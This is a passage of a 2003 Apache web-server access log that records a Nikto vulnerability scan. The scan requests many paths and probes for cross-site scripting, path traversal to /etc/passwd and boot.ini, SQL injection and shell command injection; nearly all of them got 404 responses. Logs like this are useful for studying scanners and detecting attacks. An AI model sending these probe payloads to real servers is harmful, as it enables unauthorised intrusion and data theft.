HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:30 +0900] "GET /file/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:31 +0900] "GET /fileadmin/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:31 +0900] "GET /filemanager/filemanager_forms.php HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:32 +0900] "GET /files/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:33 +0900] "GET /finance.xls HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:34 +0900] "GET /finances.xls HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:34 +0900] "GET /foo.php3 HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:35 +0900] "GET /forum/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:36 +0900] "GET /forum/admin/wwforum.mdb HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:36 +0900] "GET /forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:37 +0900] "alert(document.cookie)</script> /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\\">\\\"<script>javascript:alert(document.cookie)</script> HTTP/1.0" 501 539 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:38 +0900] "GET /forums/@ADMINDIRSconfig.php HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:39 +0900] "GET /forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:39 +0900] "GET /forums/config.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:40 +0900] "GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:41 +0900] "GET /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:41 +0900] "GET /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:42 +0900] "GET /fpadmin/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:43 +0900] "GET /fpdb/shop.mdb HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:44 +0900] "GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:44 +0900] "GET /ftp/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:45 +0900] "GET /ganglia/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:46 +0900] "GET /gb/index.php?login=true HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:46 +0900] "GET /getaccess HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:47 +0900] "GET /global.inc HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:48 +0900] "GET /globals.jsa HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:49 +0900] "GET /guestbook/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:49 +0900] "GET /guestbook/admin.php HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:50 +0900] "GET /guestbook/admin/o12guest.mdb HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:51 +0900] "GET /guests/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:51 +0900] "GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:52 +0900] "GET /GWWEB.EXE?HELP=bad-request HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:53 +0900] "GET /help.php?chapter=<script>alert('Vulnerable')</script> HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:54 +0900] "GET /help/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:54 +0900] "GET /hidden/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:55 +0900] "GET /hitmatic/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:56 +0900] "GET /hitmatic/analyse.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:56 +0900] "GET /hits.txt HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:57 +0900] "GET /hit_tracker/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:58 +0900] "GET /home.php?arsc_language=elvish HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:02 +0900] "GET /home/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:02 +0900] "GET /hostingcontroller/ HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:03 +0900] "GET /htdocs/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:04 +0900] "GET /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:04 +0900] "GET /html/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:05 +0900] "GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:06 +0900] "GET /html/cgi-bin/cgicso?query=AAA HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:07 +0900] "GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:07 +0900] "GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:08 +0900] "GET /htpasswd HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:09 +0900] "GET /HyperStat/stat_what.log HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:09 +0900] "GET /hyperstat/stat_what.log HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:10 +0900] "GET /ibill/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:11 +0900] "GET /idea/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:12 +0900] "GET /ideas/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:12 +0900] "GET /image/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:13 +0900] "GET /images/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:14 +0900] "GET /img-sys/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:16 +0900] "GET /img/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:16 +0900] "GET /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:17 +0900] "GET /import/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:18 +0900] "GET /inc/common.load.php HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:18 +0900] "GET /inc/config.php HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:19 +0900] "GET /inc/dbase.php HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:20 +0900] "GET /inc/sendmail.inc HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:21 +0900] "GET /includes/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:21 +0900] "GET /incoming/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:22 +0900] "GET /index.html.bak HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:23 +0900] "GET /index.html~ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:23 +0900] "GET /index.jsp%00x HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:24 +0900] "GET /index.php/123 HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:25 +0900] "GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:25 +0900] "GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:26 +0900] "GET /index.php/\\\"><script><script>alert(document.cookie)</script>< HTTP/1.0" 404 357 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:27 +0900] "GET /index.php?action=search&searchFor=\\\"><script>alert('Vulnerable')</script > HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:38:28 +0900] "GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:28 +0900] "GET /index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:29 +0900] "GET /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:30 +0900] "GET /index.php?file=index.php HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:31 +0900] "GET /index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:31 +0900] "GET /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:32 +0900] "GET /index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:33 +0900] "GET /index.php?page=../../../../../../../../../../boot.ini HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:33 +0900] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:34 +0900] "GET /index.php?sql_debug=1 HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:35 +0900] "GET /index.php?|=../../../../../../../../../etc/passwd HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:36 +0900] "GET /info/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:36 +0900] "GET /install/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:37 +0900] "GET /instantwebmail/message.php HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:38 +0900] "GET /interchange/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:38 +0900] "GET /internal.sws?../../winnt/win.ini HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:39 +0900] "GET /internal.sws?../../winnt/win.ini HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:40 +0900] "GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:41 +0900] "GET /intranet/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:41 +0900] "GET /ip.txt HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:42 +0900] "GET /isapi/count.pl? HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:43 +0900] "GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:43 +0900] "GET /isqlplus HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:44 +0900] "GET /jamdb/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:45 +0900] "GET /java-plugin/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:45 +0900] "GET /java-sys/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:46 +0900] "GET /java/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:47 +0900] "GET /javadoc/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:48 +0900] "GET /javax HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:48 +0900] "GET /jdbc/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:49 +0900] "GET /jgb_eng_php3/cfooter.php3 HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:50 +0900] "GET /jigsaw/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:50 +0900] "GET /Jigsaw/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:51 +0900] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:52 +0900] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:53 +0900] "GET /jspdocs/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:53 +0900] "GET /xxxxx.csp HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:54 +0900] "GET /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:55 +0900] "GET /krysalis/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:55 +0900] "GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:56 +0900] "GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:57 +0900] "GET /level/42/exec/show%20conf HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:58 +0900] "GET /lib/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:58 +0900] "GET /library/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:38:59 +0900] "GET /log.htm HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:00 +0900] "GET /log.html HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:00 +0900] "GET /log.txt HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:01 +0900] "GET /log/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:02 +0900] "GET /logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:03 +0900] "GET /logfile HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:03 +0900] "GET /logfile.htm HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:04 +0900] "GET /logfile.html HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:05 +0900] "GET /logfile.txt HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:05 +0900] "GET /logfile/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:06 +0900] "GET /logfiles/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:07 +0900] "GET /logger.html HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:08 +0900] "GET /logger/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:08 +0900] "GET /logging/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:09 +0900] "GET /logicworks.ini HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:10 +0900] "GET /login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:10 +0900] "GET /login/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:11 +0900] "GET /login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:12 +0900] "GET /login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:13 +0900] "GET /logs.txt HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:13 +0900] "GET /logs/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:14 +0900] "GET /logs/access_log HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:15 +0900] "GET /lpt9.xtp HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:15 +0900] "GET /mail/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:16 +0900] "GET /mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:17 +0900] "GET /mailman/admin/ml-name?\\\"><script>alert('Vulnerable')</script>; HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:18 +0900] "GET /mailman/listinfo/<script>alert('Vulnerable')</script> HTTP/1.0" 404 337 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:18 +0900] "GET /mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:19 +0900] "GET, /mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.0" 501 453 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:20 +0900] "GET /mall_log_files/order.log HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:21 +0900] "GET /mambo/administrator/phpinfo.php HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:21 +0900] "GET /mambo/index.php?Itemid=xxxxx HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:22 +0900] "GET /manage/cgi/cgiproc HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:23 +0900] "GET /manager/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:23 +0900] "GET /manual.php HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:24 +0900] "GET /manual/ HTTP/1.0" 200 2277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:25 +0900] "GET /marketing/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:26 +0900] "GET /master.password HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:26 +0900] "GET /mcartfree/database/metacart.mdb HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:27 +0900] "POST /Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000 HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:28 +0900] "GET /members/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:28 +0900] "GET /metacart/database/metacart.mdb HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:29 +0900] "GET /midicart.mdb HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:30 +0900] "GET /MIDICART/midicart.mdb HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:31 +0900] "GET /ministats/admin.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:31 +0900] "GET /misc/ 